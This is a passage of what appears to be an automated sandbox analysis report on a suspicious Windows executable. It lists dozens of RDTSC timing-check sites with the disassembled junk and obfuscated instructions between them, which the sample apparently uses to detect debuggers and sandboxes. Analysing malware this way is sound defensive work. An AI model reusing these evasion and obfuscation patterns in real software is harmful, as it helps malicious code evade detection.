0x00000059 mov ebx, dword ptr [ebp+122D20F0h] 0x0000005f pushad 0x00000060 mov ecx, edx 0x00000062 popad 0x00000063 mov eax, dword ptr [ebp+122D1245h] 0x00000069 xor bx, 9C3Ah 0x0000006e push FFFFFFFFh 0x00000070 nop 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 jng 00007FFAA4EF80C6h 0x0000007a jg 00007FFAA4EF80C6h 0x00000080 popad 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E8A97 second address: 9E8AC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FFAA4B0AF22h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 cld 0x00000011 mov dword ptr [ebp+122D198Dh], edi 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+12458467h], ebx 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6AF2 second address: 9E6AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E8AC9 second address: 9E8ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E9ADF second address: 9E9AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E9CCC second address: 9E9CEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FFAA4B0AF1Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jnc 00007FFAA4B0AF16h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9ECA42 second address: 9ECA48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE94E second address: 9EE954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE954 second address: 9EE958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EF8BB second address: 9EF8C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EBAD9 second address: 9EBAE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FFAA4EF80C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EBAE3 second address: 9EBB04 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFAA4B0AF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FFAA4B0AF22h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EBB04 second address: 9EBB0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EBB0A second address: 9EBB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9ECCA5 second address: 9ECCC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFAA4EF80D6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EBBC3 second address: 9EBBD5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jns 00007FFAA4B0AF16h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EAA80 second address: 9EAA8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FFAA4EF80CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F18C0 second address: 9F18C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F18C7 second address: 9F1900 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAA4EF80D4h 0x00000008 jmp 00007FFAA4EF80CEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FFAA4EF80DEh 0x00000018 jmp 00007FFAA4EF80D8h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F1900 second address: 9F1916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4B0AF22h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFB32 second address: 9EFB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFB36 second address: 9EFB47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFB47 second address: 9EFB4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFB4D second address: 9EFB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99850F second address: 998513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 998513 second address: 998567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFAA4B0AF16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FFAA4B0AF27h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FFAA4B0AF29h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007FFAA4B0AF20h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 998567 second address: 99856B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FA31B second address: 9FA321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FA321 second address: 9FA32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FA32A second address: 9FA32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC2DF second address: 9FC2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC2E3 second address: 9FC30B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFAA4B0AF1Ch 0x00000010 je 00007FFAA4B0AF16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC30B second address: 9FC311 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC311 second address: 9FC34A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFAA4B0AF18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FFAA4B0AF1Bh 0x00000014 push esi 0x00000015 pop esi 0x00000016 jmp 00007FFAA4B0AF26h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC34A second address: 9FC34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC34E second address: 9FC362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC362 second address: 9FC368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC368 second address: 9FC36C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A012DA second address: A012FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FFAA4EF80C6h 0x0000000e jmp 00007FFAA4EF80D5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A012FD second address: A01301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A03E97 second address: A03EA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FFAA4EF80C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A04038 second address: A04068 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007FFAA4B0AF16h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FFAA4B0AF29h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A04068 second address: A0406C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A08369 second address: A0839A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF26h 0x00000007 pushad 0x00000008 jmp 00007FFAA4B0AF22h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A084F4 second address: A084FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A084FA second address: A084FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A084FE second address: A0850E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A08664 second address: A08673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FFAA4B0AF16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A08673 second address: A08677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A08677 second address: A0867B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0867B second address: A08681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A10945 second address: A10949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A10C0D second address: A10C1F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFAA4EF80C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A10C1F second address: A10C36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FFAA4B0AF16h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A10ED2 second address: A10ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11075 second address: A1108B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FFAA4B0AF16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1108B second address: A110B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FFAA4EF80CEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A110B3 second address: A110B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A110B9 second address: A110D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAA4EF80CFh 0x0000000d jne 00007FFAA4EF80C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1151C second address: A11528 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFAA4B0AF16h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11528 second address: A11534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jbe 00007FFAA4EF80C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A178FC second address: A17900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A17900 second address: A1790C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16600 second address: A1663F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FFAA4B0AF26h 0x0000000a popad 0x0000000b jg 00007FFAA4B0AF38h 0x00000011 push ecx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop ecx 0x00000017 push esi 0x00000018 jmp 00007FFAA4B0AF24h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16A9A second address: A16AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16D71 second address: A16D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16D75 second address: A16D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16F30 second address: A16F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16F34 second address: A16F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A17232 second address: A17249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF23h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A173BA second address: A173C0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9934CD second address: 9934D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1606E second address: A16074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16074 second address: A16078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16078 second address: A1607E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2041B second address: A20421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A20421 second address: A2042D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D67FD second address: 9C097B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFAA4B0AF27h 0x0000000e nop 0x0000000f mov ecx, dword ptr [ebp+122D36B3h] 0x00000015 lea eax, dword ptr [ebp+1248457Dh] 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007FFAA4B0AF18h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 jmp 00007FFAA4B0AF28h 0x0000003a push eax 0x0000003b pushad 0x0000003c jmp 00007FFAA4B0AF28h 0x00000041 pushad 0x00000042 jmp 00007FFAA4B0AF1Ch 0x00000047 jmp 00007FFAA4B0AF1Dh 0x0000004c popad 0x0000004d popad 0x0000004e mov dword ptr [esp], eax 0x00000051 clc 0x00000052 call dword ptr [ebp+122D19DCh] 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b jmp 00007FFAA4B0AF26h 0x00000060 pop eax 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6A7F second address: 9D6AAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAA4EF80D6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6AAB second address: 9D6AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6F62 second address: 9D6FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007FFAA4EF80CAh 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 xchg eax, esi 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FFAA4EF80C8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov di, 2F42h 0x00000031 pushad 0x00000032 mov dword ptr [ebp+122D261Ch], edx 0x00000038 call 00007FFAA4EF80D3h 0x0000003d sub dword ptr [ebp+122D2596h], esi 0x00000043 pop ebx 0x00000044 popad 0x00000045 nop 0x00000046 jp 00007FFAA4EF80D7h 0x0000004c jmp 00007FFAA4EF80D1h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jno 00007FFAA4EF80C8h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D770B second address: 9D773E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dx, si 0x0000000f push 0000001Eh 0x00000011 mov ecx, dword ptr [ebp+122D20F0h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FFAA4B0AF1Fh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D782C second address: 9D784B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7AC7 second address: 9D7ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7ACB second address: 9D7B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FFAA4EF80C8h 0x0000000c popad 0x0000000d nop 0x0000000e add ecx, 73F2E24Dh 0x00000014 lea eax, dword ptr [ebp+124845C1h] 0x0000001a call 00007FFAA4EF80D3h 0x0000001f adc edx, 25D1EAA4h 0x00000025 pop edi 0x00000026 nop 0x00000027 push edx 0x00000028 push ebx 0x00000029 jng 00007FFAA4EF80C6h 0x0000002f pop ebx 0x00000030 pop edx 0x00000031 push eax 0x00000032 jnl 00007FFAA4EF80CEh 0x00000038 nop 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007FFAA4EF80C8h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 mov di, B139h 0x00000057 sub dword ptr [ebp+122D27E1h], ebx 0x0000005d lea eax, dword ptr [ebp+1248457Dh] 0x00000063 jmp 00007FFAA4EF80D8h 0x00000068 nop 0x00000069 js 00007FFAA4EF80CEh 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7B6C second address: 9C13CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007FFAA4B0AF25h 0x0000000b nop 0x0000000c and di, 57F1h 0x00000011 call dword ptr [ebp+122D2569h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1F5FE second address: A1F61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4EF80D8h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1F78F second address: A1F795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1F950 second address: A1F96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFAA4EF80D8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1FAA9 second address: A1FAB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
